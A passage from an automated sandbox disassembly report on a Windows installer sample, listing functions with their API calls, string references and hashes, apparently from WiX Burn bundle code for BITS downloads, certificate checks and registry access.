                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to get BITS job state., xrefs: 0088DCAB
                                                                                                                                                                                                                                                                                                  • Failure while sending progress., xrefs: 0088DCC6
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get BITS job state.$Failure while sending progress.
                                                                                                                                                                                                                                                                                                  • API String ID: 3094578987-2876445054
                                                                                                                                                                                                                                                                                                  • Opcode ID: db91af423021b9afcb91b9cb213927418e18254574407bf5189d6361d25e875c
                                                                                                                                                                                                                                                                                                  • Instruction ID: faeebd161298c1081288394abf30f2f6669bdda119ee834fd5d0b29d3bceeb1f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: db91af423021b9afcb91b9cb213927418e18254574407bf5189d6361d25e875c
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F301F532601725FBD711AB45D849E9EB7A9FF05320B000156F904D3B81DB70ED00CBD5
                                                                                                                                                                                                                                                                                                  Function 0088D7E8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • InitializeCriticalSection.KERNEL32(00000008,00000000,00000000,?,0088DF52,?,?,?,?,?,?,00000000,00000000), ref: 0088D802
                                                                                                                                                                                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,0088DF52,?,?,?,?,?,?,00000000,00000000), ref: 0088D80D
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,0088DF52,?,?,?,?,?,?,00000000,00000000), ref: 0088D81A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to create BITS job complete event., xrefs: 0088D848
                                                                                                                                                                                                                                                                                                  • bitsengine.cpp, xrefs: 0088D83E
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CreateCriticalErrorEventInitializeLastSection
                                                                                                                                                                                                                                                                                                  • String ID: Failed to create BITS job complete event.$bitsengine.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3069647169-3441864216
                                                                                                                                                                                                                                                                                                  • Opcode ID: bdf338b2ffd9b2c6d384df7a584b820e6b84836afba6aa8127d798572dd649ba
                                                                                                                                                                                                                                                                                                  • Instruction ID: a04ee87c2bba3e69eb8ed7f907bab434debc85ab244dca75bb0df16a5f101a32
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bdf338b2ffd9b2c6d384df7a584b820e6b84836afba6aa8127d798572dd649ba
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BD017576941737ABD3109F59DC05A8ABFA8FF09760B014126FD18E7A41D770D800CBE5
                                                                                                                                                                                                                                                                                                  Function 0086D4A8 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 45COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(000000D0,?,000000B8,00000000,?,00877040,000000B8,00000000,?,00000000,75A4B390), ref: 0086D4B7
                                                                                                                                                                                                                                                                                                  • InterlockedCompareExchange.KERNEL32(000000E8,00000001,00000000), ref: 0086D4C6
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(000000D0,?,00877040,000000B8,00000000,?,00000000,75A4B390), ref: 0086D4DB
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Engine active cannot be changed because it was already in that state., xrefs: 0086D4FE
                                                                                                                                                                                                                                                                                                  • userexperience.cpp, xrefs: 0086D4F4
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$CompareEnterExchangeInterlockedLeave
                                                                                                                                                                                                                                                                                                  • String ID: Engine active cannot be changed because it was already in that state.$userexperience.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3376869089-1544469594
                                                                                                                                                                                                                                                                                                  • Opcode ID: 7486f378e7548da487d43915433e7d477495225cbf438d821ce42a0e2278e938
                                                                                                                                                                                                                                                                                                  • Instruction ID: 455c2a19680939f68d010539769f98bc7f1e39771bfbfb935f1e939b1f0dd28a
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7486f378e7548da487d43915433e7d477495225cbf438d821ce42a0e2278e938
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EAF0AF32704708AFA7206FAAAC89D9773BCFB96761301442AB611D3A41DB74EC058760
                                                                                                                                                                                                                                                                                                  Function 008A1C88 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44libraryloaderCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(SRSetRestorePointW,srclient.dll), ref: 008A1CB3
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,008649DA,00000001,?,?,00864551,?,?,?,?,00865466,?,?,?,?), ref: 008A1CC2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressErrorLastProc
                                                                                                                                                                                                                                                                                                  • String ID: SRSetRestorePointW$srclient.dll$srputil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 199729137-398595594
                                                                                                                                                                                                                                                                                                  • Opcode ID: bbb616da4acd0145a6fa9f0ee8fb78d009bd420db6a54d4f6b3621ad20d29465
                                                                                                                                                                                                                                                                                                  • Instruction ID: 347978663e516264ba451f2b1d5b0a4b96630d07e77a7e98b08b9a065149dceb
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bbb616da4acd0145a6fa9f0ee8fb78d009bd420db6a54d4f6b3621ad20d29465
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E7018B36A81A3653FB2116A59C0EF566564FB127B2F010136ED02FBB51E774DC40C6D5
                                                                                                                                                                                                                                                                                                  Function 0089495D Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,0089490E,00000000,?,008948AE,00000000,008C7F08,0000000C,00894A05,00000000,00000002), ref: 0089497D
                                                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 00894990
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?,?,0089490E,00000000,?,008948AE,00000000,008C7F08,0000000C,00894A05,00000000,00000002), ref: 008949B3
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: AddressFreeHandleLibraryModuleProc
                                                                                                                                                                                                                                                                                                  • String ID: CorExitProcess$mscoree.dll
                                                                                                                                                                                                                                                                                                  • API String ID: 4061214504-1276376045
                                                                                                                                                                                                                                                                                                  • Opcode ID: bf17cc9465bdc8c13f34d531fa6613c25d7b881257d0168cd7aa0b41b5f6b1e5
                                                                                                                                                                                                                                                                                                  • Instruction ID: e6c4d19ab1c6e9dfb534dff59f82b051531f91d0bf3f941f7ff33befb53ebd23
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bf17cc9465bdc8c13f34d531fa6613c25d7b881257d0168cd7aa0b41b5f6b1e5
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87F0A930A00208BBDF00AF94DC59FAEBFB8FB05711F044169F805E2261DB748A45CB91
                                                                                                                                                                                                                                                                                                  Function 00879287 Relevance: 7.6, APIs: 1, Strings: 4, Instructions: 139COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 008793C9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A56CF: GetLastError.KERNEL32(?,?,0087933A,?,00000003,00000000,?), ref: 008A56EE
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • Failed to read certificate thumbprint., xrefs: 008793BD
                                                                                                                                                                                                                                                                                                  • cache.cpp, xrefs: 008793ED
                                                                                                                                                                                                                                                                                                  • Failed to get certificate public key identifier., xrefs: 008793F7
                                                                                                                                                                                                                                                                                                  • Failed to find expected public key in certificate chain., xrefs: 0087938A
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: ErrorLast
                                                                                                                                                                                                                                                                                                  • String ID: Failed to find expected public key in certificate chain.$Failed to get certificate public key identifier.$Failed to read certificate thumbprint.$cache.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 1452528299-3408201827
                                                                                                                                                                                                                                                                                                  • Opcode ID: efe6243a3ddcf428390f8d36845d8e31d51b6696a6e2312ef2c9b34ef74a08af
                                                                                                                                                                                                                                                                                                  • Instruction ID: 2b6afdc6a646758d00ed752e405c967632acc7b6f4ad95ebca10599df26dc46e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: efe6243a3ddcf428390f8d36845d8e31d51b6696a6e2312ef2c9b34ef74a08af
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: C3415272E00619AFDB10DBA8C841EAEB7B8FF08714F019065FA49E7395D674ED00CBA1
                                                                                                                                                                                                                                                                                                  Function 008621AC Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 119COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • MultiByteToWideChar.KERNEL32(8007139F,00000000,?,?,00000000,00000000,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 008621F2
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00000000,00000000,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 008621FE
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863BD3: GetProcessHeap.KERNEL32(00000000,000001C7,?,008621CC,000001C7,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863BDB
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00863BD3: HeapSize.KERNEL32(00000000,?,008621CC,000001C7,80004005,8007139F,?,?,008A0267,8007139F,?,00000000,00000000,8007139F), ref: 00863BE2
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Heap$ByteCharErrorLastMultiProcessSizeWide
                                                                                                                                                                                                                                                                                                  • String ID: strutil.cpp
                                                                                                                                                                                                                                                                                                  • API String ID: 3662877508-3612885251
                                                                                                                                                                                                                                                                                                  • Opcode ID: 3c4e65600eabbd143e6aa4a5b23dc79dbbf194ec92baf55e8679932b4c9c5666
                                                                                                                                                                                                                                                                                                  • Instruction ID: b8aad38c54ec754adb5d6dcf8d9eec4a7ec3ae5eade2ec5bc3af5708679e2023
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 3c4e65600eabbd143e6aa4a5b23dc79dbbf194ec92baf55e8679932b4c9c5666
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 36310932601A2AABD7208EA5CC64A6ABB95FF05774B1343A4FD15DF390EB71DC0087D0
                                                                                                                                                                                                                                                                                                  Function 008A94FD Relevance: 7.6, APIs: 5, Instructions: 119registryCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0F6C: RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00000000,00000001,008CAAA0,00000000,?,008A57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 008A0F80
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000001,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019,00000001,00000000,00000000,00020019,00000000,00000001), ref: 008A95D5
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,?,00000000,00000001,?,00000000,00000001,00000000,00020019), ref: 008A9610
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000001,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 008A962C
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 008A9639
                                                                                                                                                                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000,00000001,00020019,00000000,00000000,00000000,00000000,00000000,?), ref: 008A9646
                                                                                                                                                                                                                                                                                                    • Part of subcall function 008A0FD5: RegQueryInfoKeyW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,008A95C2,00000001), ref: 008A0FED
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Close$InfoOpenQuery
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 796878624-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 309a30a8b5bc886bae19d47d01575e878f516861f40eb64d6ee15e46f009975f
                                                                                                                                                                                                                                                                                                  • Instruction ID: 8a9afb7131410c789802a1e0262f738db6127ce34626e7f59346e0b066e5e69f
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 309a30a8b5bc886bae19d47d01575e878f516861f40eb64d6ee15e46f009975f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF416D72C0022DFFEF21AF98CC819ADFBB9FF25754F11416AE950B6521C7314E509A90
                                                                                                                                                                                                                                                                                                  Function 00868A07 Relevance: 7.6, APIs: 5, Instructions: 118stringCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,00868BC8,0086972D,?,0086972D,?,?,0086972D,?,?), ref: 00868A27
                                                                                                                                                                                                                                                                                                  • lstrlenW.KERNEL32(?,?,00000000,00000000,?,?,00868BC8,0086972D,?,0086972D,?,?,0086972D,?,?), ref: 00868A2F
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,?,?,?,?,00000000,?,00000000,00000000,?,?,00868BC8,0086972D,?,0086972D,?), ref: 00868A7E
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,00868BC8,0086972D,?,0086972D,?), ref: 00868AE0
                                                                                                                                                                                                                                                                                                  • CompareStringW.KERNEL32(0000007F,?,?,00000000,?,00000000,?,00000000,00000000,?,?,00868BC8,0086972D,?,0086972D,?), ref: 00868B0D
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CompareString$lstrlen
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1657112622-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 160b4a11aefb00d2d908609fb7cd5cdca243a0cd1839773d174c921771aa7737
                                                                                                                                                                                                                                                                                                  • Instruction ID: caff1f6e3e33b5f4537858b79e2d0119695333b99bf714d5631b657481e1bea2
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 160b4a11aefb00d2d908609fb7cd5cdca243a0cd1839773d174c921771aa7737
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EE314172A00118EFCB118E98CC85AAE3F6AFB49395F168616FD0DD7111CA719990DB92
                                                                                                                                                                                                                                                                                                  Function 008674B7 Relevance: 7.5, APIs: 2, Strings: 3, Instructions: 46COMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • EnterCriticalSection.KERNEL32(008653BD,WixBundleOriginalSource,?,?,0087A623,840F01E8,WixBundleOriginalSource,?,008CAA90,?,00000000,00865445,00000001,?,?,00865445), ref: 008674C3
                                                                                                                                                                                                                                                                                                  • LeaveCriticalSection.KERNEL32(008653BD,008653BD,00000000,00000000,?,?,0087A623,840F01E8,WixBundleOriginalSource,?,008CAA90,?,00000000,00865445,00000001,?), ref: 0086752A
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  • WixBundleOriginalSource, xrefs: 008674BF
                                                                                                                                                                                                                                                                                                  • Failed to get value as string for variable: %ls, xrefs: 00867519
                                                                                                                                                                                                                                                                                                  • Failed to get value of variable: %ls, xrefs: 008674FD
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CriticalSection$EnterLeave
                                                                                                                                                                                                                                                                                                  • String ID: Failed to get value as string for variable: %ls$Failed to get value of variable: %ls$WixBundleOriginalSource
                                                                                                                                                                                                                                                                                                  • API String ID: 3168844106-30613933
                                                                                                                                                                                                                                                                                                  • Opcode ID: f0d6aad6ca7e47593a9e6ec1bdea6f035387eadc6aec557c5b2b73479611bc91
                                                                                                                                                                                                                                                                                                  • Instruction ID: 4af66722a677d7456ce3fd0e8c4945d7acd2637746414289002951345d5fd008
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f0d6aad6ca7e47593a9e6ec1bdea6f035387eadc6aec557c5b2b73479611bc91
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E501A232944129FBDF229F44CC09A9E3F64FF11769F1241A1FE14EA621C7369E109BD5
                                                                                                                                                                                                                                                                                                  Function 0088D152 Relevance: 7.5, APIs: 5, Instructions: 41fileCOMMON
                                                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?,00000000,?,00000000,?,0088D148,00000000), ref: 0088D16D
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,0088D148,00000000), ref: 0088D179
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(008AB518,00000000,?,00000000,?,0088D148,00000000), ref: 0088D186
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000,00000000,?,00000000,?,0088D148,00000000), ref: 0088D193
                                                                                                                                                                                                                                                                                                  • UnmapViewOfFile.KERNEL32(008AB4E8,00000000,?,0088D148,00000000), ref: 0088D1A2
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1369980577.0000000000861000.00000020.00000001.01000000.00000003.sdmp, Offset: 00860000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1369962749.0000000000860000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370081675.00000000008AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370229505.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1370246845.00000000008CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_860000_LVkAi4PBv6.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CloseHandle$FileUnmapView
                                                                                                                                                                                                                                                                                                  • String ID:
